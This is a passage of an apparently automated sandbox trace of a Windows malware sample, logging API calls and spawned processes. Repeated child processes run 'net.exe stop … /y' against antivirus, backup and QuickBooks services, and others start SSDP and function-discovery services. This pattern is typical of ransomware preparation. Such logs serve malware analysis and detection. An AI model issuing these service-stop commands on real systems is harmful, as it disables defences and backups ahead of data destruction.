lpWideCharStr="System error 5 has occurred.\r\n", cchWideChar=30, lpMultiByteStr=0x483ec0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System error 5 has occurred.\r\n", lpUsedDefaultChar=0x0) returned 30 [0098.107] WriteFile (in: hFile=0x0, lpBuffer=0x483ec0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x12f248, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f248, lpOverlapped=0x0) returned 0 [0098.107] LocalFree (hMem=0x483ec0) returned 0x0 [0098.107] GetFileType (hFile=0x0) returned 0x0 [0098.107] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x486150 [0098.107] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x486150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nH", lpUsedDefaultChar=0x0) returned 2 [0098.107] WriteFile (in: hFile=0x0, lpBuffer=0x486150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12f248, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f248, lpOverlapped=0x0) returned 0 [0098.107] LocalFree (hMem=0x486150) returned 0x0 [0098.107] FormatMessageW (in: dwFlags=0x3000, lpSource=0x71be0000, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dac | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0098.108] GetFileType (hFile=0x0) returned 0x0 [0098.108] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x486150 [0098.108] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Access is denied.\r\n", cchWideChar=19, lpMultiByteStr=0x486150, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Access is denied.\r\n", lpUsedDefaultChar=0x0) returned 19 [0098.108] WriteFile (in: hFile=0x0, lpBuffer=0x486150, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x12f248, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f248, lpOverlapped=0x0) returned 0 [0098.108] LocalFree (hMem=0x486150) returned 0x0 [0098.108] GetFileType (hFile=0x0) returned 0x0 [0098.108] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x486150 [0098.108] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x486150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nH", lpUsedDefaultChar=0x0) returned 2 [0098.108] WriteFile (in: hFile=0x0, lpBuffer=0x486150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12f248, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f248, lpOverlapped=0x0) returned 0 [0098.108] LocalFree (hMem=0x486150) returned 0x0 [0098.108] NetApiBufferFree (Buffer=0x481ae0) returned 0x0 [0098.108] NetApiBufferFree (Buffer=0x481af8) returned 0x0 [0098.109] GetCommandLineW () returned="C:\\Windows\\system32\\net1 start FDResPub /y" [0098.109] exit (_Code=2) Process: id = "35" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x78da9000" os_pid = "0x8b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop DefWatch /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 123 os_tid = 0x854 Process: id = "36" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x783af000" os_pid = "0x844" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop QBIDPService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 124 os_tid = 0x5f4 Process: id = "37" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x7aab6000" os_pid = "0x72c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop Intuit.QuickBooks.FCS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 125 os_tid = 0x748 Process: id = "38" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x796bb000" os_pid = "0x90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop QBCFMonitorService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 126 os_tid = 0x7c8 Process: id = "39" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x786c0000" os_pid = "0x624" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop YooBackup /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 127 os_tid = 0xb40 Process: id = "40" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x7a5c5000" os_pid = "0x834" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop YooIT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 128 os_tid = 0xc04 Process: id = "41" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x79fca000" os_pid = "0xc08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop zhudongfangyu /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 129 os_tid = 0xc0c Process: id = "42" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x7968e000" os_pid = "0xc10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x418" cmd_line = "C:\\Windows\\system32\\net1 start SSDPSRV /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 130 os_tid = 0xc14 [0088.476] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f86c | out: lpSystemTimeAsFileTime=0x18f86c*(dwLowDateTime=0xdee6270, dwHighDateTime=0x1d6f0d1)) [0088.476] GetCurrentProcessId () returned 0xc10 [0088.476] GetCurrentThreadId () returned 0xc14 [0088.476] GetTickCount () returned 0x114bd09 [0088.476] QueryPerformanceCounter (in: lpPerformanceCount=0x18f864 | out: lpPerformanceCount=0x18f864*=20757715777) returned 1 [0088.477] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0088.477] __set_app_type (_Type=0x1) [0088.477] __p__fmode () returned 0x770331f4 [0088.477] __p__commode () returned 0x770331fc [0088.477] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0088.477] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0088.477] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0088.477] GetConsoleOutputCP () returned 0x1b5 [0088.477] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0088.477] SetThreadUILanguage (LangId=0x0) returned 0x409 [0088.480] sprintf_s (in: _DstBuf=0x18f824, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0088.480] setlocale (category=0, locale=".437") returned="English_United States.437" [0088.482] GetStdHandle (nStdHandle=0xfffffff5) returned 0x30c [0088.482] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0088.482] GetCommandLineW () returned="C:\\Windows\\system32\\net1 start SSDPSRV /y" [0088.482] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f5f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0088.482] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x64) returned 0x513ad8 [0088.482] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0088.482] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18f7f4 | out: Buffer=0x18f7f4*=0x511ae0) returned 0x0 [0088.482] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18f7f4 | out: Buffer=0x18f7f4*=0x511af8) returned 0x0 [0088.482] _fileno (_File=0x77032900) returned -2 [0088.482] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0088.482] _wcsicmp (_String1="accounts", _String2="start") returned -18 [0088.482] _wcsicmp (_String1="computer", _String2="start") returned -16 [0088.482] _wcsicmp (_String1="config", _String2="start") returned -16 [0088.483] _wcsicmp (_String1="continue", _String2="start") returned -16 [0088.483] _wcsicmp (_String1="cont", _String2="start") returned -16 [0088.483] _wcsicmp (_String1="file", _String2="start") returned -13 [0088.483] _wcsicmp (_String1="files", _String2="start") returned -13 [0088.483] _wcsicmp (_String1="group", _String2="start") returned -12 [0088.483] _wcsicmp (_String1="groups", _String2="start") returned -12 [0088.483] _wcsicmp (_String1="help", _String2="start") returned -11 [0088.483] _wcsicmp (_String1="helpmsg", _String2="start") returned -11 [0088.483] _wcsicmp (_String1="localgroup", _String2="start") returned -7 [0088.483] _wcsicmp (_String1="pause", _String2="start") returned -3 [0088.483] _wcsicmp (_String1="session", _String2="start") returned -15 [0088.483] _wcsicmp (_String1="sessions", _String2="start") returned -15 [0088.483] _wcsicmp (_String1="sess", _String2="start") returned -15 [0088.483] _wcsicmp (_String1="share", _String2="start") returned -12 [0088.483] _wcsicmp (_String1="start", _String2="start") returned 0 [0088.483] _wcsicmp (_String1="accounts", _String2="SSDPSRV") returned -18 [0088.483] _wcsicmp (_String1="computer", _String2="SSDPSRV") returned -16 [0088.483] _wcsicmp (_String1="config", _String2="SSDPSRV") returned -16 [0088.483] _wcsicmp (_String1="continue", _String2="SSDPSRV") returned -16 [0088.483] _wcsicmp (_String1="cont", _String2="SSDPSRV") returned -16 [0088.483] _wcsicmp (_String1="file", _String2="SSDPSRV") returned -13 [0088.483] _wcsicmp (_String1="files", _String2="SSDPSRV") returned -13 [0088.483] _wcsicmp (_String1="group", _String2="SSDPSRV") returned -12 [0088.483] _wcsicmp (_String1="groups", _String2="SSDPSRV") returned -12 [0088.483] _wcsicmp (_String1="help", _String2="SSDPSRV") returned -11 [0088.483] _wcsicmp (_String1="helpmsg", _String2="SSDPSRV") returned -11 [0088.483] _wcsicmp (_String1="localgroup", _String2="SSDPSRV") returned -7 [0088.483] _wcsicmp (_String1="pause", _String2="SSDPSRV") returned -3 [0088.483] _wcsicmp (_String1="session", _String2="SSDPSRV") returned -14 [0088.483] _wcsicmp (_String1="sessions", _String2="SSDPSRV") returned -14 [0088.484] _wcsicmp (_String1="sess", _String2="SSDPSRV") returned -14 [0088.484] _wcsicmp (_String1="share", _String2="SSDPSRV") returned -11 [0088.484] _wcsicmp (_String1="start", _String2="SSDPSRV") returned 1 [0088.484] _wcsicmp (_String1="stats", _String2="SSDPSRV") returned 1 [0088.484] _wcsicmp (_String1="statistics", _String2="SSDPSRV") returned 1 [0088.484] _wcsicmp (_String1="stop", _String2="SSDPSRV") returned 1 [0088.484] _wcsicmp (_String1="time", _String2="SSDPSRV") returned 1 [0088.484] _wcsicmp (_String1="user", _String2="SSDPSRV") returned 2 [0088.484] _wcsicmp (_String1="users", _String2="SSDPSRV") returned 2 [0088.484] _wcsicmp (_String1="msg", _String2="SSDPSRV") returned -6 [0088.484] _wcsicmp (_String1="messenger", _String2="SSDPSRV") returned -6 [0088.484] _wcsicmp (_String1="receiver", _String2="SSDPSRV") returned -1 [0088.484] _wcsicmp (_String1="rcv", _String2="SSDPSRV") returned -1 [0088.484] _wcsicmp (_String1="netpopup", _String2="SSDPSRV") returned -5 [0088.484] _wcsicmp (_String1="redirector", _String2="SSDPSRV") returned -1 [0088.484] _wcsicmp (_String1="redir", _String2="SSDPSRV") returned -1 [0088.484] _wcsicmp (_String1="rdr", _String2="SSDPSRV") returned -1 [0088.484] _wcsicmp (_String1="workstation", _String2="SSDPSRV") returned 4 [0088.484] _wcsicmp (_String1="work", _String2="SSDPSRV") returned 4 [0088.484] _wcsicmp (_String1="wksta", _String2="SSDPSRV") returned 4 [0088.484] _wcsicmp (_String1="prdr", _String2="SSDPSRV") returned -3 [0088.484] _wcsicmp (_String1="devrdr", _String2="SSDPSRV") returned -15 [0088.484] _wcsicmp (_String1="lanmanworkstation", _String2="SSDPSRV") returned -7 [0088.484] _wcsicmp (_String1="server", _String2="SSDPSRV") returned -14 [0088.484] _wcsicmp (_String1="svr", _String2="SSDPSRV") returned 3 [0088.484] _wcsicmp (_String1="srv", _String2="SSDPSRV") returned -1 [0088.484] _wcsicmp (_String1="lanmanserver", _String2="SSDPSRV") returned -7 [0088.484] _wcsicmp (_String1="alerter", _String2="SSDPSRV") returned -18 [0088.484] _wcsicmp (_String1="netlogon", _String2="SSDPSRV") returned -5 [0088.484] _wcsupr (in: _String="SSDPSRV" | out: _String="SSDPSRV") returned="SSDPSRV" [0088.485] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5154a8 [0088.488] GetServiceKeyNameW (in: hSCManager=0x5154a8, lpDisplayName="SSDPSRV", lpServiceName=0x3faaf0, lpcchBuffer=0x18f78c | out: lpServiceName="", lpcchBuffer=0x18f78c) returned 0 [0088.488] _wcsicmp (_String1="msg", _String2="SSDPSRV") returned -6 [0088.488] _wcsicmp (_String1="messenger", _String2="SSDPSRV") returned -6 [0088.488] _wcsicmp (_String1="receiver", _String2="SSDPSRV") returned -1 [0088.488] _wcsicmp (_String1="rcv", _String2="SSDPSRV") returned -1 [0088.488] _wcsicmp (_String1="redirector", _String2="SSDPSRV") returned -1 [0088.488] _wcsicmp (_String1="redir", _String2="SSDPSRV") returned -1 [0088.488] _wcsicmp (_String1="rdr", _String2="SSDPSRV") returned -1 [0088.488] _wcsicmp (_String1="workstation", _String2="SSDPSRV") returned 4 [0088.488] _wcsicmp (_String1="work", _String2="SSDPSRV") returned 4 [0088.489] _wcsicmp (_String1="wksta", _String2="SSDPSRV") returned 4 [0088.489] _wcsicmp (_String1="prdr", _String2="SSDPSRV") returned -3 [0088.489] _wcsicmp (_String1="devrdr", _String2="SSDPSRV") returned -15 [0088.489] _wcsicmp (_String1="lanmanworkstation", _String2="SSDPSRV") returned -7 [0088.489] _wcsicmp (_String1="server", _String2="SSDPSRV") returned -14 [0088.489] _wcsicmp (_String1="svr", _String2="SSDPSRV") returned 3 [0088.489] _wcsicmp (_String1="srv", _String2="SSDPSRV") returned -1 [0088.489] _wcsicmp (_String1="lanmanserver", _String2="SSDPSRV") returned -7 [0088.489] _wcsicmp (_String1="alerter", _String2="SSDPSRV") returned -18 [0088.489] _wcsicmp (_String1="netlogon", _String2="SSDPSRV") returned -5 [0088.489] NetServiceControl (in: servername=0x0, service="SSDPSRV", opcode=0x0, arg=0x0, bufptr=0x18f780 | out: bufptr=0x18f780) returned 0x0 [0088.491] NetServiceInstall (in: servername=0x0, service="SSDPSRV", argc=0x0, argv=0x0, bufptr=0x18f770 | out: bufptr=0x18f770) returned 0x0 [0089.010] free (_Block=0x0) [0089.010] GetServiceDisplayNameW (in: hSCManager=0x5154a8, lpServiceName="SSDPSRV", lpDisplayName=0x401fc0, lpcchBuffer=0x18f748 | out: lpDisplayName="SSDP Discovery", lpcchBuffer=0x18f748) returned 1 [0089.011] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0089.011] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0089.011] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdc2, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The SSDP Discovery service is starting") returned 0x26 [0089.012] GetFileType (hFile=0x30c) returned 0x3 [0089.012] LocalAlloc (uFlags=0x0, uBytes=0x4c) returned 0x516150 [0089.012] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The SSDP Discovery service is starting", cchWideChar=38, lpMultiByteStr=0x516150, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The SSDP Discovery service is starting", lpUsedDefaultChar=0x0) returned 38 [0089.012] WriteFile (in: hFile=0x30c, lpBuffer=0x516150*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x18f6f4, lpOverlapped=0x0 | out: lpBuffer=0x516150*, lpNumberOfBytesWritten=0x18f6f4*=0x26, lpOverlapped=0x0) returned 1 [0089.012] LocalFree (hMem=0x516150) returned 0x0 [0089.012] NetapipBufferAllocate () returned 0x0 [0089.012] _vsnwprintf_s (in: _Buffer=0x404880, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x18f750 | out: _Buffer=".") returned 1 [0089.012] GetFileType (hFile=0x30c) returned 0x3 [0089.013] LocalAlloc (uFlags=0x0, uBytes=0x2) returned 0x516150 [0089.013] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x516150, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".\x8eQ", lpUsedDefaultChar=0x0) returned 1 [0089.013] WriteFile (in: hFile=0x30c, lpBuffer=0x516150*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18f724, lpOverlapped=0x0 | out: lpBuffer=0x516150*, lpNumberOfBytesWritten=0x18f724*=0x1, lpOverlapped=0x0) returned 1 [0089.013] LocalFree (hMem=0x516150) returned 0x0 [0089.013] Sleep (dwMilliseconds=0x7d0) [0093.406] NetApiBufferFree (Buffer=0x517e38) returned 0x0 [0093.406] NetServiceControl (in: servername=0x0, service="SSDPSRV", opcode=0x0, arg=0x0, bufptr=0x18f780 | out: bufptr=0x18f780) returned 0x0 [0093.568] _vsnwprintf_s (in: _Buffer=0x404880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\r\n", _ArgList=0x18f750 | out: _Buffer="\r\n") returned 2 [0093.568] GetFileType (hFile=0x30c) returned 0x3 [0093.568] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x516150 [0093.568] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x516150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nQ", lpUsedDefaultChar=0x0) returned 2 [0093.568] WriteFile (in: hFile=0x30c, lpBuffer=0x516150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18f724, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f724, lpOverlapped=0x0) returned 0 [0093.568] LocalFree (hMem=0x516150) returned 0x0 [0093.568] GetServiceDisplayNameW (in: hSCManager=0x5154a8, lpServiceName="SSDPSRV", lpDisplayName=0x401fc0, lpcchBuffer=0x18f748 | out: lpDisplayName="SSDP Discovery", lpcchBuffer=0x18f748) returned 1 [0093.569] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdc4, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The SSDP Discovery service was started successfully.\r\n") returned 0x36 [0093.569] GetFileType (hFile=0x30c) returned 0x3 [0093.569] LocalAlloc (uFlags=0x0, uBytes=0x6c) returned 0x516150 [0093.569] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The SSDP Discovery service was started successfully.\r\n", cchWideChar=54, lpMultiByteStr=0x516150, cbMultiByte=108, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The SSDP Discovery service was started successfully.\r\n", lpUsedDefaultChar=0x0) returned 54 [0093.569] WriteFile (in: hFile=0x30c, lpBuffer=0x516150, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x18f6f4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f6f4, lpOverlapped=0x0) returned 0 [0093.569] LocalFree (hMem=0x516150) returned 0x0 [0093.569] GetFileType (hFile=0x30c) returned 0x3 [0093.569] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x516150 [0093.569] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x516150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nQ", lpUsedDefaultChar=0x0) returned 2 [0093.569] WriteFile (in: hFile=0x30c, lpBuffer=0x516150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18f6f4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f6f4, lpOverlapped=0x0) returned 0 [0093.569] LocalFree (hMem=0x516150) returned 0x0 [0093.569] NetApiBufferFree (Buffer=0x517e38) returned 0x0 [0093.569] NetApiBufferFree (Buffer=0x517748) returned 0x0 [0093.569] NetApiBufferFree (Buffer=0x511ae0) returned 0x0 [0093.570] NetApiBufferFree (Buffer=0x511af8) returned 0x0 [0093.570] GetCommandLineW () returned="C:\\Windows\\system32\\net1 start SSDPSRV /y" [0093.570] exit (_Code=0) Process: id = "43" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x798d2000" os_pid = "0xc58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop EhttpSrv /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 132 os_tid = 0xc5c Process: id = "44" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x77bd7000" os_pid = "0xc68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop ccEvtMgr /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 133 os_tid = 0xc6c Process: id = "45" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x229dc000" os_pid = "0xc70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop stc_raw_agent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], 